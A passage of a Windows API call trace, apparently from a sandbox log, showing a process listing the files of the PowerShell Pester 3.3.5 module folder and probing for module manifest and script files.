ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0281.588] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0281.588] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0281.588] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0281.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aa40) returned 1 [0281.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aa00) returned 1 [0281.589] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ab10) returned 1 [0281.589] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x653ef8a5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0281.589] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\*"), lpFindFileData=0x653ef8a820 | out: lpFindFileData=0x653ef8a820*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0281.589] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.589] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0281.589] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0281.590] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0281.590] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0281.590] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0281.590] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0281.590] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0281.591] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0281.591] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0281.591] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0281.591] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0281.591] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0281.591] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0281.592] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0281.592] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a7e0 | out: lpFindFileData=0x653ef8a7e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 0 [0281.592] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0281.592] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aa40) returned 1 [0281.592] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aa00) returned 1 [0281.592] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x653ef8a6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0281.592] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ab20) returned 1 [0281.592] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5"), fInfoLevelId=0x0, lpFileInformation=0x653ef8ac00 | out: lpFileInformation=0x653ef8ac00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0281.592] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aae0) returned 1 [0281.592] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ab70) returned 1 [0281.593] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x653ef8a650, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0281.593] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\*"), lpFindFileData=0x653ef8a880 | out: lpFindFileData=0x653ef8a880*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0281.624] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a840 | out: lpFindFileData=0x653ef8a840*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.625] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a840 | out: lpFindFileData=0x653ef8a840*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0281.625] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a840 | out: lpFindFileData=0x653ef8a840*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0281.625] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a840 | out: lpFindFileData=0x653ef8a840*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0281.625] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a840 | out: lpFindFileData=0x653ef8a840*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0281.626] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a840 | out: lpFindFileData=0x653ef8a840*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Examples", cAlternateFileName="")) returned 1 [0281.626] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a840 | out: lpFindFileData=0x653ef8a840*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3246caf, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3246caf, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Functions", cAlternateFileName="FUNCTI~1")) returned 1 [0281.626] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a840 | out: lpFindFileData=0x653ef8a840*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x263, dwReserved0=0x0, dwReserved1=0x0, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0281.626] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a840 | out: lpFindFileData=0x653ef8a840*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x16f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="nunit_schema_2.5.xsd", cAlternateFileName="")) returned 1 [0281.626] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a840 | out: lpFindFileData=0x653ef8a840*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0281.627] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a840 | out: lpFindFileData=0x653ef8a840*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0281.627] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a840 | out: lpFindFileData=0x653ef8a840*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0281.627] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a840 | out: lpFindFileData=0x653ef8a840*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0281.627] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a840 | out: lpFindFileData=0x653ef8a840*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0281.627] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a840 | out: lpFindFileData=0x653ef8a840*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0281.627] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8a840 | out: lpFindFileData=0x653ef8a840*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0281.627] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0281.628] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aaa0) returned 1 [0281.628] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8aa60) returned 1 [0281.628] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.psd1")) returned 0xffffffff [0281.628] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.psm1")) returned 0xffffffff [0281.628] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.cdxml")) returned 0xffffffff [0281.628] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.xaml")) returned 0xffffffff [0281.628] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.dll")) returned 0xffffffff [0281.628] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x653ef8a860, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0281.628] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8acb0) returned 1 [0281.628] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester" (normalized: "c:\\program files\\windowspowershell\\modules\\pester"), fInfoLevelId=0x0, lpFileInformation=0x653ef8ad90 | out: lpFileInformation=0x653ef8ad90*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0281.628] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ac70) returned 1 [0281.629] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ad00) returned 1 [0281.629] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x653ef8a7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0281.629] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\*"), lpFindFileData=0x653ef8aa10 | out: lpFindFileData=0x653ef8aa10*(dwFileAttributes=0x14, 